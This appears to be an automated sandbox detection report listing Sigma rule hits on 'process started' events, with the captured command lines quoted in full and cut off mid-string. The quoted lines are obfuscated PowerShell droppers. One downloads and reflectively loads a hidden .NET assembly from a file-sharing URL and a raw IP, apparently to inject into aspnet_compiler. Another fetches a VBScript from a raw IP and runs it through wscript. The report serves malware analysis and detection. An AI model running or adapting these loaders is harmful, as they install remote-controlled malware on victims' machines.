        Source: Process startedAuthor: Teymur Kheirkhabarov (idea), Vasiliy Burov (rule), oscd.community, Tim Shelton (fp): Data: Command: "C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe" -windowstyle hidden -executionpolicy bypass -NoProfile -command "(('4Amochavilha = sIWhttps://310'+'5.filemail.com/api/file/get?filekey=shTPH'+'bCPX8o'+'-lOtCqHLG6_0x'+'Cy-xl4tnxlAVbQ95-dv'+'iTK5cAR'+'aNdQjbb3mexfwQzKmTXg&skipreg=true&pk_vi'+'d=e01'+'09638c9bfb9571732531'+'309b5ff7c sIW;4Amtrichismo = New-Object System.Net.WebClient;4Amlinfotomia = '+'4Amtrichismo.DownloadData(4Amo'+'chavilha);4Ampresum'+'ptu'+'oso = [System.Text.Encoding]::UTF8.GetString(4'+'Amlinfotom'+'ia);4Amnitidular = sIW<<BA'+'SE64_START>>sIW;4Amobvolvido = sIW'+'<<BASE6'+'4_END>>sIW;4Amlogogrifo = 4Ampr'+'esumptuoso.IndexOf(4Amniti'+'dular'+');4Amtolhido = 4Ampresumptuoso.IndexOf(4Amo'+'bvolvido);4Amlogogrifo -ge 0 -and 4Amtolhido -gt 4Amlogogrifo;4Amlogogrifo += 4Amnitidular.Leng'+'th;4Amvindita = 4Amtolhido - 4Amlogogrifo;4Am'+'figa = 4Ampresumptuoso.Substring(4Amlogogrifo, 4Amvindita);4Amantigamente = -join (4Amfiga.To'+'CharArra'+'y() S'+'E2 ForEach-Obje'+'ct { 4Am_ })[-1..-(4Amfiga.Length)];4Amma'+'rmor'+'izar'+' = ['+'System.Convert]::FromBase64String(4Amantigamente);4Amdesemmadeirar = [System.Reflection.Assemb'+'ly]::Load(4Ammarmorizar);4Ampoe'+'tificar = [dnlib.IO.Home].GetMethod(s'+'IWVAIs'+'IW);4Am'+'poetificar.Invoke(4Amnull, @(sIWtxt.VGFRE/3431/92.321.542.271//:ptthsIW, sIW4Amde'+'sunificarsIW, sIW4AmdesunificarsIW, sIW4AmdesunificarsIW, sIWaspnet_compilersIW, sIW4'+'AmdesunificarsIW, sIW4AmdesunificarsIW,sIW4Amdesunifica'+'rsIW,sIW4AmdesunificarsIW,sIW4AmdesunificarsIW,sIW4AmdesunificarsIW,sIW4AmdesunificarsIW,sIW1sIW,sI'+'W4AmdesunificarsIW));') -cREPlAce ([chaR]52+[chaR]65+[chaR]109),[chaR]36 -cREPlAce 'sIW',[chaR]39 -cREPlAce([chaR]83+[chaR]69+[chaR]50),[chaR]124) | &( $ENv:ComspEc[4,24,25]-JoiN'')", CommandLine: "C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe" -windowstyle hidden -executionpolicy bypass -NoProfile -command "(('4Amochavilha = sIWhttps://310'+'5.filemail.com/api/file/get?filekey=shTPH'+'bCPX8o'+'-lOtCqHLG6_0x'+'Cy-xl4tnxlAVbQ95-dv'+'iTK5cAR'+'aNdQjbb3mexfwQzKmTXg&skipreg=true&pk_vi'+'d=e01'+'09638c9bfb9571732531'+'309b5ff7c sIW;4Amtrichismo = New-Object System.Net.WebClient;4Amlinfotomia = '+'4Amtrichismo.DownloadData(4Amo'+'chavilha);4Ampresum'+'ptu'+'oso = [System.Text.Encoding]::UTF8.GetString(4'+'Amlinfotom'+'ia);4Amnitidular = sIW<<BA'+'SE64_START>>sIW;4Amobvolvido = sIW'+'<<BASE6'+'4_END>>sIW;4Amlogogrifo = 4Ampr'+'esumptuoso.IndexOf(4Amniti'+'dular'+');4Amtolhido = 4Ampresumptuoso.IndexOf(4Amo'+'bvolvido);4Amlogogrifo -ge 0 -and 4Amtolhido -gt 4Amlogogrifo;4Amlogogrifo += 4Amnitidular.Leng'+'th;4Amvindita = 4Amtolhido - 4Amlogogrifo;4Am'+'figa = 4Ampresumptuoso.Substring(4Amlogogrifo, 4Amvindita);4Amantigamente = -join (4Amfiga.To'+'CharArra'+'y() S'+'E2 ForEach-Obje'+'ct { 4Am_ })[-1..-(4Amfiga.Length)];4Amma'+'rmor'+'izar'+' = ['+'System.Convert]::FromBase64String(4Amantigamente);4Amdesemmadeirar = [System.Reflection.Assemb'+'ly]::Load(4Ammarmoriz
        Source: Process startedAuthor: Teymur Kheirkhabarov (idea), Vasiliy Burov (rule), oscd.community, Tim Shelton: Data: Command: "C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe" -windowstyle hidden -executionpolicy bypass -NoProfile -command "(('4Amochavilha = sIWhttps://310'+'5.filemail.com/api/file/get?filekey=shTPH'+'bCPX8o'+'-lOtCqHLG6_0x'+'Cy-xl4tnxlAVbQ95-dv'+'iTK5cAR'+'aNdQjbb3mexfwQzKmTXg&skipreg=true&pk_vi'+'d=e01'+'09638c9bfb9571732531'+'309b5ff7c sIW;4Amtrichismo = New-Object System.Net.WebClient;4Amlinfotomia = '+'4Amtrichismo.DownloadData(4Amo'+'chavilha);4Ampresum'+'ptu'+'oso = [System.Text.Encoding]::UTF8.GetString(4'+'Amlinfotom'+'ia);4Amnitidular = sIW<<BA'+'SE64_START>>sIW;4Amobvolvido = sIW'+'<<BASE6'+'4_END>>sIW;4Amlogogrifo = 4Ampr'+'esumptuoso.IndexOf(4Amniti'+'dular'+');4Amtolhido = 4Ampresumptuoso.IndexOf(4Amo'+'bvolvido);4Amlogogrifo -ge 0 -and 4Amtolhido -gt 4Amlogogrifo;4Amlogogrifo += 4Amnitidular.Leng'+'th;4Amvindita = 4Amtolhido - 4Amlogogrifo;4Am'+'figa = 4Ampresumptuoso.Substring(4Amlogogrifo, 4Amvindita);4Amantigamente = -join (4Amfiga.To'+'CharArra'+'y() S'+'E2 ForEach-Obje'+'ct { 4Am_ })[-1..-(4Amfiga.Length)];4Amma'+'rmor'+'izar'+' = ['+'System.Convert]::FromBase64String(4Amantigamente);4Amdesemmadeirar = [System.Reflection.Assemb'+'ly]::Load(4Ammarmorizar);4Ampoe'+'tificar = [dnlib.IO.Home].GetMethod(s'+'IWVAIs'+'IW);4Am'+'poetificar.Invoke(4Amnull, @(sIWtxt.VGFRE/3431/92.321.542.271//:ptthsIW, sIW4Amde'+'sunificarsIW, sIW4AmdesunificarsIW, sIW4AmdesunificarsIW, sIWaspnet_compilersIW, sIW4'+'AmdesunificarsIW, sIW4AmdesunificarsIW,sIW4Amdesunifica'+'rsIW,sIW4AmdesunificarsIW,sIW4AmdesunificarsIW,sIW4AmdesunificarsIW,sIW4AmdesunificarsIW,sIW1sIW,sI'+'W4AmdesunificarsIW));') -cREPlAce ([chaR]52+[chaR]65+[chaR]109),[chaR]36 -cREPlAce 'sIW',[chaR]39 -cREPlAce([chaR]83+[chaR]69+[chaR]50),[chaR]124) | &( $ENv:ComspEc[4,24,25]-JoiN'')", CommandLine: "C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe" -windowstyle hidden -executionpolicy bypass -NoProfile -command "(('4Amochavilha = sIWhttps://310'+'5.filemail.com/api/file/get?filekey=shTPH'+'bCPX8o'+'-lOtCqHLG6_0x'+'Cy-xl4tnxlAVbQ95-dv'+'iTK5cAR'+'aNdQjbb3mexfwQzKmTXg&skipreg=true&pk_vi'+'d=e01'+'09638c9bfb9571732531'+'309b5ff7c sIW;4Amtrichismo = New-Object System.Net.WebClient;4Amlinfotomia = '+'4Amtrichismo.DownloadData(4Amo'+'chavilha);4Ampresum'+'ptu'+'oso = [System.Text.Encoding]::UTF8.GetString(4'+'Amlinfotom'+'ia);4Amnitidular = sIW<<BA'+'SE64_START>>sIW;4Amobvolvido = sIW'+'<<BASE6'+'4_END>>sIW;4Amlogogrifo = 4Ampr'+'esumptuoso.IndexOf(4Amniti'+'dular'+');4Amtolhido = 4Ampresumptuoso.IndexOf(4Amo'+'bvolvido);4Amlogogrifo -ge 0 -and 4Amtolhido -gt 4Amlogogrifo;4Amlogogrifo += 4Amnitidular.Leng'+'th;4Amvindita = 4Amtolhido - 4Amlogogrifo;4Am'+'figa = 4Ampresumptuoso.Substring(4Amlogogrifo, 4Amvindita);4Amantigamente = -join (4Amfiga.To'+'CharArra'+'y() S'+'E2 ForEach-Obje'+'ct { 4Am_ })[-1..-(4Amfiga.Length)];4Amma'+'rmor'+'izar'+' = ['+'System.Convert]::FromBase64String(4Amantigamente);4Amdesemmadeirar = [System.Reflection.Assemb'+'ly]::Load(4Ammarmoriz
        Source: Process startedAuthor: Florian Roth (Nextron Systems), Tim Shelton: Data: Command: "C:\Windows\System32\WScript.exe" "C:\Users\user\AppData\Roaming\seemebestthingswithentirethingswithgreatnaturething.vbS" , CommandLine: "C:\Windows\System32\WScript.exe" "C:\Users\user\AppData\Roaming\seemebestthingswithentirethingswithgreatnaturething.vbS" , CommandLine|base64offset|contains: , Image: C:\Windows\SysWOW64\wscript.exe, NewProcessName: C:\Windows\SysWOW64\wscript.exe, OriginalFileName: C:\Windows\SysWOW64\wscript.exe, ParentCommandLine: POwErSHeLL -EX byPasS -noP -w 1 -C dEvICEcReDEnTialDepLOYMeNt ; invOkE-ExPREsSiOn($(invOKe-expreSSIon('[sYStEM.TExt.EnCOdINg]'+[ChAR]0X3a+[cHar]58+'Utf8.GETStRING([sYsTem.coNVeRT]'+[cHAr]58+[chaR]58+'fromBASE64String('+[ChaR]0X22+'JHFidmRDTlAzWCAgICAgICAgICAgICAgICAgICAgICAgICAgICAgICAgPSAgICAgICAgICAgICAgICAgICAgICAgICAgICAgICAgYURELVRZUGUgICAgICAgICAgICAgICAgICAgICAgICAgICAgICAgIC1NZW1iZXJERUZJTklUaW9OICAgICAgICAgICAgICAgICAgICAgICAgICAgICAgICAnW0RsbEltcG9ydCgidVJMTW9uIiwgICAgICAgICAgICAgICAgICAgICAgICAgICAgICAgIENoYXJTZXQgPSBDaGFyU2V0LlVuaWNvZGUpXXB1YmxpYyBzdGF0aWMgZXh0ZXJuIEludFB0ciBVUkxEb3dubG9hZFRvRmlsZShJbnRQdHIgICAgICAgICAgICAgICAgICAgICAgICAgICAgICAgIEZOcEpJS3Asc3RyaW5nICAgICAgICAgICAgICAgICAgICAgICAgICAgICAgICB5R09zTE1jLHN0cmluZyAgICAgICAgICAgICAgICAgICAgICAgICAgICAgICAgckFuYlBOLHVpbnQgICAgICAgICAgICAgICAgICAgICAgICAgICAgICAgIFhuVmJyQyxJbnRQdHIgICAgICAgICAgICAgICAgICAgICAgICAgICAgICAgIGtoenNHaU9LKTsnICAgICAgICAgICAgICAgICAgICAgICAgICAgICAgICAtbmFtRSAgICAgICAgICAgICAgICAgICAgICAgICAgICAgICAgImpMYmZUSnJTSXVqIiAgICAgICAgICAgICAgICAgICAgICAgICAgICAgICAgLW5BbWVzUGFjZSAgICAgICAgICAgICAgICAgICAgICAgICAgICAgICAgQXcgICAgICAgICAgICAgICAgICAgICAgICAgICAgICAgIC1QYXNzVGhydTsgICAgICAgICAgICAgICAgICAgICAgICAgICAgICAgICRxYnZkQ05QM1g6OlVSTERvd25sb2FkVG9GaWxlKDAsImh0dHA6Ly8xNzIuMjQ1LjEyMy4yOS8xMzQzL3NlZW1lYmVzdHRoaW5nc3dpdGhlbnRpcmV0aGluZ3N3aXRoZ3JlYXRuYXR1cmV0aGluZ3MudElGIiwiJGVuVjpBUFBEQVRBXHNlZW1lYmVzdHRoaW5nc3dpdGhlbnRpcmV0aGluZ3N3aXRoZ3JlYXRuYXR1cmV0aGluZy52YlMiLDAsMCk7c1RhUlQtU0xlZVAoMyk7aUkgICAgICAgICAgICAgICAgICAgICAgICAgICAgICAgICIkRW52OkFQUERBVEFcc2VlbWViZXN0dGhpbmdzd2l0aGVudGlyZXRoaW5nc3dpdGhncmVhdG5hdHVyZXRoaW5nLnZiUyI='+[CHaR]34+'))')))", ParentImage: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exe, ParentProcessId: 7452, ParentProcessName: powershell.exe, ProcessCommandLine: "C:\Windows\System32\WScript.exe" "C:\Users\user\AppData\Roaming\seemebestthingswithentirethingswithgreatnaturething.vbS" , ProcessId: 7672, ProcessName: wscript.exe
        Source: Process startedAuthor: Florian Roth (Nextron Systems): Data: Command: "C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe" -command $Codigo = 'KCgnNEFtb2NoYXZpbGhhID0gc0lXaHR0cHM6Ly8zMTAnKyc1LmZpbGVtYWlsLmNvbS9hcGkvZmlsZS9nZXQ/ZmlsZWtleT1zaFRQSCcrJ2JDUFg4bycrJy1sT3RDcUhMRzZfMHgnKydDeS14bDR0bnhsQVZiUTk1LWR2JysnaVRLNWNBUicrJ2FOZFFqYmIzbWV4ZndRekttVFhnJnNraXByZWc9dHJ1ZSZwa192aScrJ2Q9ZTAxJysnMDk2MzhjOWJmYjk1NzE3MzI1MzEnKyczMDliNWZmN2Mgc0lXOzRBbXRyaWNoaXNtbyA9IE5ldy1PYmplY3QgU3lzdGVtLk5ldC5XZWJDbGllbnQ7NEFtbGluZm90b21pYSA9ICcrJzRBbXRyaWNoaXNtby5Eb3dubG9hZERhdGEoNEFtbycrJ2NoYXZpbGhhKTs0QW1wcmVzdW0nKydwdHUnKydvc28gPSBbU3lzdGVtLlRleHQuRW5jb2RpbmddOjpVVEY4LkdldFN0cmluZyg0JysnQW1saW5mb3RvbScrJ2lhKTs0QW1uaXRpZHVsYXIgPSBzSVc8PEJBJysnU0U2NF9TVEFSVD4+c0lXOzRBbW9idm9sdmlkbyA9IHNJVycrJzw8QkFTRTYnKyc0X0VORD4+c0lXOzRBbWxvZ29ncmlmbyA9IDRBbXByJysnZXN1bXB0dW9zby5JbmRleE9mKDRBbW5pdGknKydkdWxhcicrJyk7NEFtdG9saGlkbyA9IDRBbXByZXN1bXB0dW9zby5JbmRleE9mKDRBbW8nKydidm9sdmlkbyk7NEFtbG9nb2dyaWZvIC1nZSAwIC1hbmQgNEFtdG9saGlkbyAtZ3QgNEFtbG9nb2dyaWZvOzRBbWxvZ29ncmlmbyArPSA0QW1uaXRpZHVsYXIuTGVuZycrJ3RoOzRBbXZpbmRpdGEgPSA0QW10b2xoaWRvIC0gNEFtbG9nb2dyaWZvOzRBbScrJ2ZpZ2EgPSA0QW1wcmVzdW1wdHVvc28uU3Vic3RyaW5nKDRBbWxvZ29ncmlmbywgNEFtdmluZGl0YSk7NEFtYW50aWdhbWVudGUgPSAtam9pbiAoNEFtZmlnYS5UbycrJ0NoYXJBcnJhJysneSgpIFMnKydFMiBGb3JFYWNoLU9iamUnKydjdCB7IDRBbV8gfSlbLTEuLi0oNEFtZmlnYS5MZW5ndGgpXTs0QW1tYScrJ3Jtb3InKydpemFyJysnID0gWycrJ1N5c3RlbS5Db252ZXJ0XTo6RnJvbUJhc2U2NFN0cmluZyg0QW1hbnRpZ2FtZW50ZSk7NEFtZGVzZW1tYWRlaXJhciA9IFtTeXN0ZW0uUmVmbGVjdGlvbi5Bc3NlbWInKydseV06OkxvYWQoNEFtbWFybW9yaXphcik7NEFtcG9lJysndGlmaWNhciA9IFtkbmxpYi5JTy5Ib21lXS5HZXRNZXRob2QocycrJ0lXVkFJcycrJ0lXKTs0QW0nKydwb2V0aWZpY2FyLkludm9rZSg0QW1udWxsLCBAKHNJV3R4dC5WR0ZSRS8zNDMxLzkyLjMyMS41NDIuMjcxLy86cHR0aHNJVywgc0lXNEFtZGUnKydzdW5pZmljYXJzSVcsIHNJVzRBbWRlc3VuaWZpY2Fyc0lXLCBzSVc0QW1kZXN1bmlmaWNhcnNJVywgc0lXYXNwbmV0X2NvbXBpbGVyc0lXLCBzSVc0JysnQW1kZXN1bmlmaWNhcnNJVywgc0lXNEFtZGVzdW5pZmljYXJzSVcsc0lXNEFtZGVzdW5pZmljYScrJ3JzSVcsc0lXNEFtZGVzdW5pZmljYXJzSVcsc0lXNEFtZGVzdW5pZmljYXJzSVcsc0lXNEFtZGVzdW5pZmljYXJzSVcsc0lXNEFtZGVzdW5pZmljYXJzSVcsc0lXMXNJVyxzSScrJ1c0QW1kZXN1bmlmaWNhcnNJVykpOycpIC1jUkVQbEFjZSAoW2NoYVJdNTIrW2NoYVJdNjUrW2NoYVJdMTA5KSxbY2hhUl0zNiAtY1JFUGxBY2UgJ3NJVycsW2NoYVJdMzkgIC1jUkVQbEFjZShbY2hhUl04MytbY2hhUl02OStbY2hhUl01MCksW2NoYVJdMTI0KSB8ICYoICRFTnY6Q29tc3BFY1s0LDI0LDI1XS1Kb2lOJycp';$OWjuxd = [system.Text.encoding]::UTF8.GetString([system.Convert]::Frombase64String($codigo));powershell.exe -windowstyle hidden -executionpolicy bypass -NoProfile -command $OWjuxD, CommandLine: "C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe" -command $Codigo = 'KCgnNEFtb2NoYXZpbGhhID0gc0lXaHR0cHM6Ly8zMTAnKyc1LmZpbGVtYWlsLmNvbS9hcGkvZmlsZS9nZXQ/ZmlsZWtleT1zaFRQSCcrJ2JDUFg4bycrJy1sT3RDcUhMRzZfMHgnKydDeS14bDR0bnhsQVZiUTk1LWR2JysnaVRLNWNBUicrJ2FOZFFqYmIzbWV4ZndRekttVFhnJnNraXByZWc9dHJ1ZSZwa192aScrJ2Q9ZTAxJysnMDk2MzhjOWJmYjk1NzE3MzI1MzEnKyczMDliNWZmN2Mgc0lXOzRBbXRyaWNoaXNtbyA9IE5ldy1PYmplY3QgU3lzdGVtLk5ldC5XZWJDbGllbnQ7NEFtbGluZm90b21pYSA9ICcrJzRBbXRyaWNoaXNtby5Eb3dubG9hZERhdGEoNEFt
        Source: Process startedAuthor: pH-T (Nextron Systems), Harjot Singh, @cyb3rjy0t: Data: Command: "C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe" -command $Codigo = 'KCgnNEFtb2NoYXZpbGhhID0gc0lXaHR0cHM6Ly8zMTAnKyc1LmZpbGVtYWlsLmNvbS9hcGkvZmlsZS9nZXQ/ZmlsZWtleT1zaFRQSCcrJ2JDUFg4bycrJy1sT3RDcUhMRzZfMHgnKydDeS14bDR0bnhsQVZiUTk1LWR2JysnaVRLNWNBUicrJ2FOZFFqYmIzbWV4ZndRekttVFhnJnNraXByZWc9dHJ1ZSZwa192aScrJ2Q9ZTAxJysnMDk2MzhjOWJmYjk1NzE3MzI1MzEnKyczMDliNWZmN2Mgc0lXOzRBbXRyaWNoaXNtbyA9IE5ldy1PYmplY3QgU3lzdGVtLk5ldC5XZWJDbGllbnQ7NEFtbGluZm90b21pYSA9ICcrJzRBbXRyaWNoaXNtby5Eb3dubG9hZERhdGEoNEFtbycrJ2NoYXZpbGhhKTs0QW1wcmVzdW0nKydwdHUnKydvc28gPSBbU3lzdGVtLlRleHQuRW5jb2RpbmddOjpVVEY4LkdldFN0cmluZyg0JysnQW1saW5mb3RvbScrJ2lhKTs0QW1uaXRpZHVsYXIgPSBzSVc8PEJBJysnU0U2NF9TVEFSVD4+c0lXOzRBbW9idm9sdmlkbyA9IHNJVycrJzw8QkFTRTYnKyc0X0VORD4+c0lXOzRBbWxvZ29ncmlmbyA9IDRBbXByJysnZXN1bXB0dW9zby5JbmRleE9mKDRBbW5pdGknKydkdWxhcicrJyk7NEFtdG9saGlkbyA9IDRBbXByZXN1bXB0dW9zby5JbmRleE9mKDRBbW8nKydidm9sdmlkbyk7NEFtbG9nb2dyaWZvIC1nZSAwIC1hbmQgNEFtdG9saGlkbyAtZ3QgNEFtbG9nb2dyaWZvOzRBbWxvZ29ncmlmbyArPSA0QW1uaXRpZHVsYXIuTGVuZycrJ3RoOzRBbXZpbmRpdGEgPSA0QW10b2xoaWRvIC0gNEFtbG9nb2dyaWZvOzRBbScrJ2ZpZ2EgPSA0QW1wcmVzdW1wdHVvc28uU3Vic3RyaW5nKDRBbWxvZ29ncmlmbywgNEFtdmluZGl0YSk7NEFtYW50aWdhbWVudGUgPSAtam9pbiAoNEFtZmlnYS5UbycrJ0NoYXJBcnJhJysneSgpIFMnKydFMiBGb3JFYWNoLU9iamUnKydjdCB7IDRBbV8gfSlbLTEuLi0oNEFtZmlnYS5MZW5ndGgpXTs0QW1tYScrJ3Jtb3InKydpemFyJysnID0gWycrJ1N5c3RlbS5Db252ZXJ0XTo6RnJvbUJhc2U2NFN0cmluZyg0QW1hbnRpZ2FtZW50ZSk7NEFtZGVzZW1tYWRlaXJhciA9IFtTeXN0ZW0uUmVmbGVjdGlvbi5Bc3NlbWInKydseV06OkxvYWQoNEFtbWFybW9yaXphcik7NEFtcG9lJysndGlmaWNhciA9IFtkbmxpYi5JTy5Ib21lXS5HZXRNZXRob2QocycrJ0lXVkFJcycrJ0lXKTs0QW0nKydwb2V0aWZpY2FyLkludm9rZSg0QW1udWxsLCBAKHNJV3R4dC5WR0ZSRS8zNDMxLzkyLjMyMS41NDIuMjcxLy86cHR0aHNJVywgc0lXNEFtZGUnKydzdW5pZmljYXJzSVcsIHNJVzRBbWRlc3VuaWZpY2Fyc0lXLCBzSVc0QW1kZXN1bmlmaWNhcnNJVywgc0lXYXNwbmV0X2NvbXBpbGVyc0lXLCBzSVc0JysnQW1kZXN1bmlmaWNhcnNJVywgc0lXNEFtZGVzdW5pZmljYXJzSVcsc0lXNEFtZGVzdW5pZmljYScrJ3JzSVcsc0lXNEFtZGVzdW5pZmljYXJzSVcsc0lXNEFtZGVzdW5pZmljYXJzSVcsc0lXNEFtZGVzdW5pZmljYXJzSVcsc0lXNEFtZGVzdW5pZmljYXJzSVcsc0lXMXNJVyxzSScrJ1c0QW1kZXN1bmlmaWNhcnNJVykpOycpIC1jUkVQbEFjZSAoW2NoYVJdNTIrW2NoYVJdNjUrW2NoYVJdMTA5KSxbY2hhUl0zNiAtY1JFUGxBY2UgJ3NJVycsW2NoYVJdMzkgIC1jUkVQbEFjZShbY2hhUl04MytbY2hhUl02OStbY2hhUl01MCksW2NoYVJdMTI0KSB8ICYoICRFTnY6Q29tc3BFY1s0LDI0LDI1XS1Kb2lOJycp';$OWjuxd = [system.Text.encoding]::UTF8.GetString([system.Convert]::Frombase64String($codigo));powershell.exe -windowstyle hidden -executionpolicy bypass -NoProfile -command $OWjuxD, CommandLine: "C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe" -command $Codigo = 'KCgnNEFtb2NoYXZpbGhhID0gc0lXaHR0cHM6Ly8zMTAnKyc1LmZpbGVtYWlsLmNvbS9hcGkvZmlsZS9nZXQ/ZmlsZWtleT1zaFRQSCcrJ2JDUFg4bycrJy1sT3RDcUhMRzZfMHgnKydDeS14bDR0bnhsQVZiUTk1LWR2JysnaVRLNWNBUicrJ2FOZFFqYmIzbWV4ZndRekttVFhnJnNraXByZWc9dHJ1ZSZwa192aScrJ2Q9ZTAxJysnMDk2MzhjOWJmYjk1NzE3MzI1MzEnKyczMDliNWZmN2Mgc0lXOzRBbXRyaWNoaXNtbyA9IE5ldy1PYmplY3QgU3lzdGVtLk5ldC5XZWJDbGllbnQ7NEFtbGluZm90b21pYSA9ICcrJzRBbXRyaWNoaXNtby5Eb3dubG9hZERhdGEoNEFt
        Source: Process startedAuthor: Michael Haag: Data: Command: "C:\Windows\system32\cmd.exe" "/C POwErSHeLL -EX byPasS -noP -w 1 -C dEvICEcReDEnTialDepLOYMeNt ; invOkE-ExPREsSiOn($(invOKe-expreSSIon('[sYStEM.TExt.EnCOdINg]'+[ChAR]0X3a+[cHar]58+'Utf8.GETStRING([sYsTem.coNVeRT]'+[cHAr]58+[chaR]58+'fromBASE64String('+[ChaR]0X22+'JHFidmRDTlAzWCAgICAgICAgICAgICAgICAgICAgICAgICAgICAgICAgPSAgICAgICAgICAgICAgICAgICAgICAgICAgICAgICAgYURELVRZUGUgICAgICAgICAgICAgICAgICAgICAgICAgICAgICAgIC1NZW1iZXJERUZJTklUaW9OICAgICAgICAgICAgICAgICAgICAgICAgICAgICAgICAnW0RsbEltcG9ydCgidVJMTW9uIiwgICAgICAgICAgICAgICAgICAgICAgICAgICAgICAgIENoYXJTZXQgPSBDaGFyU2V0LlVuaWNvZGUpXXB1YmxpYyBzdGF0aWMgZXh0ZXJuIEludFB0ciBVUkxEb3dubG9hZFRvRmlsZShJbnRQdHIgICAgICAgICAgICAgICAgICAgICAgICAgICAgICAgIEZOcEpJS3Asc3RyaW5nICAgICAgICAgICAgICAgICAgICAgICAgICAgICAgICB5R09zTE1jLHN0cmluZyAgICAgICAgICAgICAgICAgICAgICAgICAgICAgICAgckFuYlBOLHVpbnQgICAgICAgICAgICAgICAgICAgICAgICAgICAgICAgIFhuVmJyQyxJbnRQdHIgICAgICAgICAgICAgICAgICAgICAgICAgICAgICAgIGtoenNHaU9LKTsnICAgICAgICAgICAgICAgICAgICAgICAgICAgICAgICAtbmFtRSAgICAgICAgICAgICAgICAgICAgICAgICAgICAgICAgImpMYmZUSnJTSXVqIiAgICAgICAgICAgICAgICAgICAgICAgICAgICAgICAgLW5BbWVzUGFjZSAgICAgICAgICAgICAgICAgICAgICAgICAgICAgICAgQXcgICAgICAgICAgICAgICAgICAgICAgICAgICAgICAgIC1QYXNzVGhydTsgICAgICAgICAgICAgICAgICAgICAgICAgICAgICAgICRxYnZkQ05QM1g6OlVSTERvd25sb2FkVG9GaWxlKDAsImh0dHA6Ly8xNzIuMjQ1LjEyMy4yOS8xMzQzL3NlZW1lYmVzdHRoaW5nc3dpdGhlbnRpcmV0aGluZ3N3aXRoZ3JlYXRuYXR1cmV0aGluZ3MudElGIiwiJGVuVjpBUFBEQVRBXHNlZW1lYmVzdHRoaW5nc3dpdGhlbnRpcmV0aGluZ3N3aXRoZ3JlYXRuYXR1cmV0aGluZy52YlMiLDAsMCk7c1RhUlQtU0xlZVAoMyk7aUkgICAgICAgICAgICAgICAgICAgICAgICAgICAgICAgICIkRW52OkFQUERBVEFcc2VlbWViZXN0dGhpbmdzd2l0aGVudGlyZXRoaW5nc3dpdGhncmVhdG5hdHVyZXRoaW5nLnZiUyI='+[CHaR]34+'))')))", CommandLine: "C:\Windows\system32\cmd.exe" "/C POwErSHeLL -EX byPasS -noP -w 1 -C dEvICEcReDEnTialDepLOYMeNt ; invOkE-ExPREsSiOn($(invOKe-expreSSIon('[sYStEM.TExt.EnCOdINg]'+[ChAR]0X3a+[cHar]58+'Utf8.GETStRING([sYsTem.coNVeRT]'+[cHAr]58+[chaR]58+'fromBASE64String('+[ChaR]0X22+'JHFidmRDTlAzWCAgICAgICAgICAgICAgICAgICAgICAgICAgICAgICAgPSAgICAgICAgICAgICAgICAgICAgICAgICAgICAgICAgYURELVRZUGUgICAgICAgICAgICAgICAgICAgICAgICAgICAgICAgIC1NZW1iZXJERUZJTklUaW9OICAgICAgICAgICAgICAgICAgICAgICAgICAgICAgICAnW0RsbEltcG9ydCgidVJMTW9uIiwgICAgICAgICAgICAgICAgICAgICAgICAgICAgICAgIENoYXJTZXQgPSBDaGFyU2V0LlVuaWNvZGUpXXB1YmxpYyBzdGF0aWMgZXh0ZXJuIEludFB0ciBVUkxEb3dubG9hZFRvRmlsZShJbnRQdHIgICAgICAgICAgICAgICAgICAgICAgICAgICAgICAgIEZOcEpJS3Asc3RyaW5nICAgICAgICAgICAgICAgICAgICAgICAgICAgICAgICB5R09zTE1jLHN0cmluZyAgICAgICAgICAgICAgICAgICAgICAgICAgICAgICAgckFuYlBOLHVpbnQgICAgICAgICAgICAgICAgICAgICAgICAgICAgICAgIFhuVmJyQyxJbnRQdHIgICAgICAgICAgICAgICAgICAgICAgICAgICAgICAgIGtoenNHaU9LKTsnICAgICAgICAgICAgICAgICAgICAgICAgICAgICA
        Source: Process startedAuthor: Margaritis Dimitrios (idea), Florian Roth (Nextron Systems), oscd.community: Data: Command: "C:\Windows\System32\WScript.exe" "C:\Users\user\AppData\Roaming\seemebestthingswithentirethingswithgreatnaturething.vbS" , CommandLine: "C:\Windows\System32\WScript.exe" "C:\Users\user\AppData\Roaming\seemebestthingswithentirethingswithgreatnaturething.vbS" , CommandLine|base64offset|contains: , Image: C:\Windows\SysWOW64\wscript.exe, NewProcessName: C:\Windows\SysWOW64\wscript.exe, OriginalFileName: C:\Windows\SysWOW64\wscript.exe, ParentCommandLine: POwErSHeLL -EX byPasS -noP -w 1 -C dEvICEcReDEnTialDepLOYMeNt ; invOkE-ExPREsSiOn($(invOKe-expreSSIon('[sYStEM.TExt.EnCOdINg]'+[ChAR]0X3a+[cHar]58+'Utf8.GETStRING([sYsTem.coNVeRT]'+[cHAr]58+[chaR]58+'fromBASE64String('+[ChaR]0X22+'JHFidmRDTlAzWCAgICAgICAgICAgICAgICAgICAgICAgICAgICAgICAgPSAgICAgICAgICAgICAgICAgICAgICAgICAgICAgICAgYURELVRZUGUgICAgICAgICAgICAgICAgICAgICAgICAgICAgICAgIC1NZW1iZXJERUZJTklUaW9OICAgICAgICAgICAgICAgICAgICAgICAgICAgICAgICAnW0RsbEltcG9ydCgidVJMTW9uIiwgICAgICAgICAgICAgICAgICAgICAgICAgICAgICAgIENoYXJTZXQgPSBDaGFyU2V0LlVuaWNvZGUpXXB1YmxpYyBzdGF0aWMgZXh0ZXJuIEludFB0ciBVUkxEb3dubG9hZFRvRmlsZShJbnRQdHIgICAgICAgICAgICAgICAgICAgICAgICAgICAgICAgIEZOcEpJS3Asc3RyaW5nICAgICAgICAgICAgICAgICAgICAgICAgICAgICAgICB5R09zTE1jLHN0cmluZyAgICAgICAgICAgICAgICAgICAgICAgICAgICAgICAgckFuYlBOLHVpbnQgICAgICAgICAgICAgICAgICAgICAgICAgICAgICAgIFhuVmJyQyxJbnRQdHIgICAgICAgICAgICAgICAgICAgICAgICAgICAgICAgIGtoenNHaU9LKTsnICAgICAgICAgICAgICAgICAgICAgICAgICAgICAgICAtbmFtRSAgICAgICAgICAgICAgICAgICAgICAgICAgICAgICAgImpMYmZUSnJTSXVqIiAgICAgICAgICAgICAgICAgICAgICAgICAgICAgICAgLW5BbWVzUGFjZSAgICAgICAgICAgICAgICAgI